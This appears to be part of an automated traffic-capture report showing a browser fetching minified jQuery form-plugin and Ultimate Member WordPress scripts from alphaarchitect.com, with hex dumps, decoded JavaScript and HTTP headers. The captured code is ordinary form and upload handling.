                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 69 64 61 74 65 20 74 72 69 67 67 65 72 22 29 3b 65 6c 73 65 7b 76 61 72 20 72 2c 6f 2c 69 2c 65 3d 4c 2e 70 61 72 61 6d 28 61 2c 74 29 2c 73 3d 28 75 26 26 28 65 3d 65 3f 65 2b 22 26 22 2b 75 3a 75 29 2c 22 47 45 54 22 3d 3d 63 2e 74 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3f 28 63 2e 75 72 6c 2b 3d 28 30 3c 3d 63 2e 75 72 6c 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3f 22 26 22 3a 22 3f 22 29 2b 65 2c 63 2e 64 61 74 61 3d 6e 75 6c 6c 29 3a 63 2e 64 61 74 61 3d 65 2c 5b 5d 29 3b 63 2e 72 65 73 65 74 46 6f 72 6d 26 26 73 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 2e 72 65 73 65 74 46 6f 72 6d 28 29 7d 29 2c 63 2e 63 6c 65 61 72 46 6f 72 6d 26 26 73 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 2e 63 6c 65 61 72 46 6f 72 6d 28 63
                                                                                                                                                                                                                                                                        Data Ascii: idate trigger");else{var r,o,i,e=L.param(a,t),s=(u&&(e=e?e+"&"+u:u),"GET"==c.type.toUpperCase()?(c.url+=(0<=c.url.indexOf("?")?"&":"?")+e,c.data=null):c.data=e,[]);c.resetForm&&s.push(function(){E.resetForm()}),c.clearForm&&s.push(function(){E.clearForm(c
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 74 75 72 6e 20 6f 7d 28 63 2e 65 78 74 72 61 44 61 74 61 29 3b 66 6f 72 28 74 3d 30 3b 74 3c 72 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 72 5b 74 5d 26 26 61 2e 61 70 70 65 6e 64 28 72 5b 74 5d 5b 30 5d 2c 72 5b 74 5d 5b 31 5d 29 7d 63 2e 64 61 74 61 3d 6e 75 6c 6c 3b 76 61 72 20 6e 3d 4c 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 4c 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2c 63 2c 7b 63 6f 6e 74 65 6e 74 54 79 70 65 3a 21 31 2c 70 72 6f 63 65 73 73 44 61 74 61 3a 21 31 2c 63 61 63 68 65 3a 21 31 2c 74 79 70 65 3a 41 7c 7c 22 50 4f 53 54 22 7d 29 3b 63 2e 75 70 6c 6f 61 64 50 72 6f 67 72 65 73 73 26 26 28 6e 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 4c 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 72 65 74 75 72 6e 20 65 2e
                                                                                                                                                                                                                                                                        Data Ascii: turn o}(c.extraData);for(t=0;t<r.length;t++)r[t]&&a.append(r[t][0],r[t][1])}c.data=null;var n=L.extend(!0,{},L.ajaxSettings,c,{contentType:!1,processData:!1,cache:!1,type:A||"POST"});c.uploadProgress&&(n.xhr=function(){var e=L.ajaxSettings.xhr();return e.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 7d 2c 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 61 62 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 74 69 6d 65 6f 75 74 22 3d 3d 3d 65 3f 22 74 69 6d 65 6f 75 74 22 3a 22 61 62 6f 72 74 65 64 22 3b 4d 28 22 61 62 6f 72 74 69 6e 67 20 75 70 6c 6f 61 64 2e 2e 2e 20 22 2b 74 29 2c 74 68 69 73 2e 61 62 6f 72 74 65 64 3d 31 3b 74 72 79 7b 6d 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 65 78 65 63 43 6f 6d 6d 61 6e 64 26 26 6d 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 65 78 65 63 43 6f 6d 6d 61 6e 64 28 22 53 74 6f 70 22 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 2e 61 74 74 72 28 22 73 72 63 22 2c 6c 2e 69 66 72
                                                                                                                                                                                                                                                                        Data Ascii: ction(){},setRequestHeader:function(){},abort:function(e){var t="timeout"===e?"timeout":"aborted";M("aborting upload... "+t),this.aborted=1;try{m.contentWindow.document.execCommand&&m.contentWindow.document.execCommand("Stop")}catch(e){}f.attr("src",l.ifr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 6f 6e 73 65 58 4d 4c 3a 65 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 3b 72 65 74 75 72 6e 20 6e 26 26 22 70 61 72 73 65 72 65 72 72 6f 72 22 3d 3d 3d 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6e 6f 64 65 4e 61 6d 65 26 26 4c 2e 65 72 72 6f 72 26 26 4c 2e 65 72 72 6f 72 28 22 70 61 72 73 65 72 65 72 72 6f 72 22 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 28 65 3d 61 26 26 61 2e 64 61 74 61 46 69 6c 74 65 72 3f 61 2e 64 61 74 61 46 69 6c 74 65 72 28 65 2c 74 29 3a 65 29 26 26 28 22 6a 73 6f 6e 22 3d 3d 3d 74 7c 7c 21 74 26 26 30 3c 3d 72 2e 69 6e 64 65 78 4f 66 28 22 6a 73 6f 6e 22 29 3f 65 3d 69 28 65 29 3a 28 22 73 63 72 69 70 74 22 3d 3d 3d 74 7c 7c 21 74 26 26 30 3c 3d 72 2e 69 6e 64 65 78 4f 66 28 22 6a 61 76 61 73 63 72 69 70 74 22
                                                                                                                                                                                                                                                                        Data Ascii: onseXML:e.responseText;return n&&"parsererror"===e.documentElement.nodeName&&L.error&&L.error("parsererror"),"string"==typeof(e=a&&a.dataFilter?a.dataFilter(e,t):e)&&("json"===t||!t&&0<=r.indexOf("json")?e=i(e):("script"===t||!t&&0<=r.indexOf("javascript"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 2c 6d 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 6d 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 44 29 3a 6d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 44 2c 21 31 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 72 79 7b 76 61 72 20 74 3d 6b 28 6d 29 2e 72 65 61 64 79 53 74 61 74 65 3b 4d 28 22 73 74 61 74 65 20 3d 20 22 2b 74 29 2c 74 26 26 22 75 6e 69 6e 69 74 69 61 6c 69 7a 65 64 22 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 35 30 29 7d 63 61 74 63 68 28 65 29 7b 4d 28 22 53 65 72 76 65 72 20 61 62 6f 72 74 3a 20 22 2c 65 2c 22 20 28 22 2c 65 2e 6e 61 6d 65 2c 22 29 22 29 2c 44 28 76 29 2c 68 26 26 63 6c 65 61 72 54 69
                                                                                                                                                                                                                                                                        Data Ascii: ,m.attachEvent?m.attachEvent("onload",D):m.addEventListener("load",D,!1),setTimeout(function e(){try{var t=k(m).readyState;M("state = "+t),t&&"uninitialized"==t.toLowerCase()&&setTimeout(e,50)}catch(e){M("Server abort: ",e," (",e.name,")"),D(v),h&&clearTi
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 74 22 29 7c 7c 70 2e 73 74 61 74 75 73 54 65 78 74 29 2c 28 6c 2e 64 61 74 61 54 79 70 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 2c 63 3d 2f 28 6a 73 6f 6e 7c 73 63 72 69 70 74 7c 74 65 78 74 29 2f 2e 74 65 73 74 28 73 29 3b 63 7c 7c 6c 2e 74 65 78 74 61 72 65 61 3f 28 72 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 74 65 78 74 61 72 65 61 22 29 5b 30 5d 29 3f 28 70 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 3d 72 2e 76 61 6c 75 65 2c 70 2e 73 74 61 74 75 73 3d 4e 75 6d 62 65 72 28 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 61 74 75 73 22 29 29 7c 7c 70 2e 73 74 61 74 75 73 2c 70 2e 73 74 61 74 75 73 54 65 78 74 3d 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 61 74 75 73 54 65 78 74 22 29
                                                                                                                                                                                                                                                                        Data Ascii: t")||p.statusText),(l.dataType||"").toLowerCase()),c=/(json|script|text)/.test(s);c||l.textarea?(r=b.getElementsByTagName("textarea")[0])?(p.responseText=r.value,p.status=Number(r.getAttribute("status"))||p.status,p.statusText=r.getAttribute("statusText")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 28 4c 2e 66 6e 2e 6f 6e 29 2c 65 2e 64 65 6c 65 67 61 74 69 6f 6e 7c 7c 30 21 3d 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3f 65 2e 64 65 6c 65 67 61 74 69 6f 6e 3f 28 4c 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 66 66 28 22 73 75 62 6d 69 74 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 61 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 72 29 2e 6f 6e 28 22 73 75 62 6d 69 74 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 65 2c 61 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 65 2c 72 29 2c 74 68 69 73 29 3a 74 68 69 73 2e 61 6a 61 78 46 6f 72 6d 55 6e
                                                                                                                                                                                                                                                                        Data Ascii: (L.fn.on),e.delegation||0!==this.length?e.delegation?(L(document).off("submit.form-plugin",this.selector,a).off("click.form-plugin",this.selector,r).on("submit.form-plugin",this.selector,e,a).on("click.form-plugin",this.selector,e,r),this):this.ajaxFormUn
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 65 3a 66 2c 76 61 6c 75 65 3a 64 5b 69 5d 2c 74 79 70 65 3a 63 2e 74 79 70 65 7d 29 3b 65 6c 73 65 20 61 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 66 2c 76 61 6c 75 65 3a 22 22 2c 74 79 70 65 3a 63 2e 74 79 70 65 7d 29 7d 65 6c 73 65 20 6e 75 6c 6c 21 3d 73 26 26 28 74 26 26 74 2e 70 75 73 68 28 63 29 2c 61 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 66 2c 76 61 6c 75 65 3a 73 2c 74 79 70 65 3a 63 2e 74 79 70 65 2c 72 65 71 75 69 72 65 64 3a 63 2e 72 65 71 75 69 72 65 64 7d 29 29 3b 21 65 26 26 72 2e 63 6c 6b 26 26 28 66 3d 28 75 3d 28 6e 3d 4c 28 72 2e 63 6c 6b 29 29 5b 30 5d 29 2e 6e 61 6d 65 29 26 26 21 75 2e 64 69 73 61 62 6c 65 64 26 26 22 69 6d 61 67 65 22 3d 3d 75 2e 74 79 70 65 26 26 28 61 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 66 2c 76 61 6c 75 65 3a 6e 2e 76 61
                                                                                                                                                                                                                                                                        Data Ascii: e:f,value:d[i],type:c.type});else a.push({name:f,value:"",type:c.type})}else null!=s&&(t&&t.push(c),a.push({name:f,value:s,type:c.type,required:c.required}));!e&&r.clk&&(f=(u=(n=L(r.clk))[0]).name)&&!u.disabled&&"image"==u.type&&(a.push({name:f,value:n.va


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        79192.168.2.449836141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC795OUTGET /wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2fcd"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9fdace94243-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC877INData Raw: 32 66 63 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 73 61 6e 69 74 69 7a 65 5f 76 61 6c 75 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 65 3d 28 61 2e 69 6e 6e 65 72 54 65 78 74 3d 65 2c 61 2e 69 6e 6e 65 72 48 54 4d 4c 29 3b 72 65 74 75 72 6e 20 74 26 26 6a 51 75 65 72 79 28 74 29 2e 76 61 6c 28 65 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 75 6e 73 61 6e 69 74 69 7a 65 5f 76 61 6c 75 65 28 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2c 30 3d 3d 3d 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3f 22 22 3a 74
                                                                                                                                                                                                                                                                        Data Ascii: 2fcdfunction um_sanitize_value(e,t){var a=document.createElement("div"),e=(a.innerText=e,a.innerHTML);return t&&jQuery(t).val(e),e}function um_unsanitize_value(e){var t=document.createElement("textarea");return t.innerHTML=e,0===t.childNodes.length?"":t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 63 68 69 6c 64 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 70 61 72 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 74 29 2e 66 69 6e 64 28 65 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 68 69 64 65 41 6c 6c 28 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 31 2c 2e 75 6d 2d 73 32 22 29 2e 63 73 73 28 7b 64 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 26 26 28 6a 51 75
                                                                                                                                                                                                                                                                        Data Ascii: unction(){var e=jQuery(this).attr("data-child"),t=jQuery(this).attr("data-parent");return jQuery(this).parents(t).find(e).trigger("click"),UM.dropdown.hideAll(),!1}),jQuery(".um-s1,.um-s2").css({display:"block"}),"function"==typeof jQuery.fn.select2&&(jQu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 79 3a 21 30 7d 29 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 68 61 6e 67 65 22 2c 27 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 6c 61 62 65 6c 22 29 3b 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 22 29 2e 66 69 6e 64 28 22 69 22 29 2e 72 65 6d 6f 76 65 41 74 74
                                                                                                                                                                                                                                                                        Data Ascii: y:!0})),jQuery(document).on("change",'.um-field-area input[type="radio"]',function(){var e=jQuery(this).parents(".um-field-area"),t=jQuery(this).parents("label");e.find(".um-field-radio").removeClass("active"),e.find(".um-field-radio").find("i").removeAtt
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 6f 77 28 29 2c 61 2e 66 69 6e 64 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 74 6e 2e 75 6d 2d 66 69 6e 69 73 68 2d 75 70 6c 6f 61 64 22 29 2e 61 64 64 43 6c 61 73 73 28 22 64 69 73 61 62 6c 65 64 22 29 2c 75 6d 5f 6d 6f 64 61 6c 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 7d 7d 29 3a 28 61 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 22 29 2c 6e 3d 61 2e 64 61 74 61 28 22 6d 6f 64 65 22 29 2c 69 3d 61 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 20 69 6d 67 22 29 2e 61 74 74 72 28 22 73 72 63 22 29 2c 65 3d 61 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 23 27 2b 61 2e 64 61 74 61 28 22 6b 65 79 22 29 2b 22 2d 22 2b 6a 51 75 65 72
                                                                                                                                                                                                                                                                        Data Ascii: ow(),a.find(".um-modal-btn.um-finish-upload").addClass("disabled"),um_modal_responsive()}}):(a=jQuery(this).parents(".um-field"),n=a.data("mode"),i=a.find(".um-single-image-preview img").attr("src"),e=a.find('input[type="hidden"]#'+a.data("key")+"-"+jQuer
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 69 3d 61 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 69 6e 66 6f 20 61 22 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 2c 6e 3d 61 2e 64 61 74 61 28 22 6d 6f 64 65 22 29 2c 65 3d 61 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 23 27 2b 61 2e 64 61 74 61 28 22 6b 65 79 22 29 2b 22 2d 22 2b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 66 6f 72 6d 22 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 5b 6e 61 6d 65 3d 22 66 6f 72 6d 5f 69 64 22 5d 27 29 2e 76 61 6c 28 29 29 2e 76 61 6c 28 29 2c 72 3d 7b 64 61 74 61 3a 7b 6d 6f 64 65 3a 6e 2c 66 69 6c 65 6e 61 6d 65 3a 65 2c 73 72 63 3a 69 2c 6e 6f 6e 63 65 3a 75 6d 5f 73 63 72 69 70 74 73 2e 6e 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: i=a.find(".um-single-fileinfo a").attr("href"),n=a.data("mode"),e=a.find('input[type="hidden"]#'+a.data("key")+"-"+jQuery(this).parents("form").find('input[type="hidden"][name="form_id"]').val()).val(),r={data:{mode:n,filename:e,src:i,nonce:um_scripts.non
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 65 6e 67 74 68 3f 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 62 6f 64 79 22 29 2e 72 65 6d 6f 76 65 28 29 3a 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 62 6f 64 79 22 29 2e 68 69 64 65 28 29 2c 30 3c 74 26 26 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 62 6f 64 79 22 29 2e 6c 65 6e 67 74 68 3c 74 26 26 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 68 65 61 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 64 69 73 61 62 6c 65 64 22 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d
                                                                                                                                                                                                                                                                        Data Ascii: ength?jQuery(this).parents(".um-field-group-body").remove():jQuery(this).parents(".um-field-group-body").hide(),0<t&&e.find(".um-field-group-body").length<t&&e.find(".um-field-group-head").removeClass("disabled"),!1}),jQuery(document.body).on("click",".um
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 68 6f 6f 6b 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 75 73 65 72 5f 69 64 22 29 2c 61 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 61 72 67 73 22 29 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 73 2d 72 65 6d 6f 76 65 22 29 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 22 2b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 73 2d 72 65 6d 6f 76 65 22 29 29 2e 66 61 64 65 4f 75 74 28 22 66 61 73 74 22 29 2c 6a 51 75 65 72 79 2e 61 6a 61 78 28 7b 75 72 6c 3a 77 70 2e 61 6a 61
                                                                                                                                                                                                                                                                        Data Ascii: nction(e){e.preventDefault();var e=jQuery(this).data("hook"),t=jQuery(this).data("user_id"),a=jQuery(this).data("args");return jQuery(this).data("js-remove")&&jQuery(this).parents("."+jQuery(this).data("js-remove")).fadeOut("fast"),jQuery.ajax({url:wp.aja
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 6e 65 28 22 63 6c 69 63 6b 22 2c 27 2e 75 6d 3a 6e 6f 74 28 2e 75 6d 2d 61 63 63 6f 75 6e 74 29 20 2e 75 6d 2d 66 6f 72 6d 20 69 6e 70 75 74 5b 63 6c 61 73 73 3d 22 75 6d 2d 62 75 74 74 6f 6e 22 5d 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 6e 6f 74 28 2e 75 6d 2d 68 61 73 2d 72 65 63 61 70 74 63 68 61 29 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 64 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 66 6f 72 6d 22 29 2e 74 72 69 67 67 65 72 28 22 73 75 62 6d 69 74 22 29 7d 29 3b 76 61 72 20 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 2c 61 29 7b 76 61 72 20 6e 2c 69 2c 72 3d 74 2e 70 61 72 65 6e 74 73 28 22
                                                                                                                                                                                                                                                                        Data Ascii: ne("click",'.um:not(.um-account) .um-form input[class="um-button"][type="submit"]:not(.um-has-recaptcha)',function(){jQuery(this).attr("disabled","disabled"),jQuery(this).parents("form").trigger("submit")});var o={};function d(t,e,a){var n,i,r=t.parents("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 28 72 29 29 2c 75 6d 5f 63 68 61 6e 67 65 5f 74 61 67 28 72 29 29 2c 22 79 65 73 22 21 3d 3d 65 2e 70 6f 73 74 2e 6d 65 6d 62 65 72 73 5f 64 69 72 65 63 74 6f 72 79 26 26 28 76 6f 69 64 20 30 3d 3d 3d 65 2e 66 69 65 6c 64 2e 64 65 66 61 75 6c 74 7c 7c 74 2e 64 61 74 61 28 22 75 6d 2d 6f 72 69 67 69 6e 61 6c 2d 76 61 6c 75 65 22 29 3f 22 22 21 3d 3d 74 2e 64 61 74 61 28 22 75 6d 2d 6f 72 69 67 69 6e 61 6c 2d 76 61 6c 75 65 22 29 26 26 74 2e 76 61 6c 28 74 2e 64 61 74 61 28 22 75 6d 2d 6f 72 69 67 69 6e 61 6c 2d 76 61 6c 75 65 22 29 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 3a 74 2e 76 61 6c 28 65 2e 66 69 65 6c 64 2e 64 65 66 61 75 6c 74 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 2c 30 3d 3d 65 2e 66 69 65 6c 64 2e 65 64 69 74
                                                                                                                                                                                                                                                                        Data Ascii: (r)),um_change_tag(r)),"yes"!==e.post.members_directory&&(void 0===e.field.default||t.data("um-original-value")?""!==t.data("um-original-value")&&t.val(t.data("um-original-value")).trigger("change"):t.val(e.field.default).trigger("change"),0==e.field.edit
